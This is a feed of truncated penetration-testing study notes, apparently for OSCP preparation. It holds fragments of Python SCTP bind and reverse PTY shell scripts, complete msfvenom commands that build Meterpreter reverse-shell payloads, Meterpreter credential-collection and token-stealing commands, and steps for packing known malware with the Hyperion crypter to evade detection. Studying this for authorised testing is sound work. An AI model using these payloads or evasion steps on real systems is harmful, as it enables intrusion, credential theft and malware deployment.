Latest notes for PenTesting- MrLeet

MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: unknowndevice64 2019-05-18 13:27:31

#!/usr/bin/env python2
import termios
import select
import socket
import os
import fcntl
import argparse
from sctp import *

class PTY:
def __init__(self, slave=0, pid=os.getpid()):
# apparently python GC's modules before class instances so, here
# we have some hax to ensure we can restore the terminal state.

Score: 0

By: unknowndevice64 2019-05-18 13:27:35

Python Bind SCTP PTY Shell - testing version
infodox - (2013)
Binds a PTY to a SCTP port on the host it is ran on.
Use the script to connect.
import os
import pty
import socket
from sctp import *

lport = 31337 # XXX: CHANGEME

def main()...

Score: 0

By: unknowndevice64 2019-05-18 13:27:38

Reverse Connect SCTP PTY Shell - testing version
infodox - (2013)
For an excellent listener use the following socat command:
socat file:`tty`,echo=0,raw sctp-listen:PORT
Alternatively, use
import os
import pty
import socket
from sctp import...

Score: 0

List payloads

msfvenom -l



msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf


msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe



Score: 0

<h2>Information Gathering</h2>
run winenum.rb
run scraper.rb
run checkvm
run credscollect
run get_local_subnets

<h2>Escalating Privs</h2>
ps then migrate

Tokens (use incognito)
list_tokens -u
steal_token ...

Score: 0

There are many pages on the web documenting quick reverse shell one liners.
Pentestmonkey and Bernardo Damele have both created a good few posts between
them but I wanted to recapture what they’ve got for my notes purposes.
(It’s easier for me to find stuff if it’s in one place).
All credit goes to both of those guys where I got all t...

Score: 0

By: unknowndevice64 2019-05-18 12:26:48

Penetration Testing: What You Should Know
About Kali Linux
About Penetration Testing
The Domain
Offensive Security Labs

Getting Comfortable with Kali Linux
Finding Your Way Around Kali
Managing Kali Linux Services
The Bash Environment
Intro to Bash Scripting

The EssentiaTools

Score: 0

Crypting Known Malware with Software Protectors

One such open source crypter, called Hyperion

cp /usr/share/windows-binaries/
cd Hyperion-1.0/
i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3...

Score: 0

See Metasploit Unleashed Course in the Essentials

Search for exploits using Metasploit GitHub framework source code:
Translate them for use on OSCP LAB or EXAM.


MetaSploit requires Postfresql

systemctl start postgresql

To enabl...

Score: 1

Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port

apt-get install rinetd

cat /etc/rinetd.conf

# bindadress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80

SSH Local Port Forwarding: supports bi-directional communicatio...

Score: 0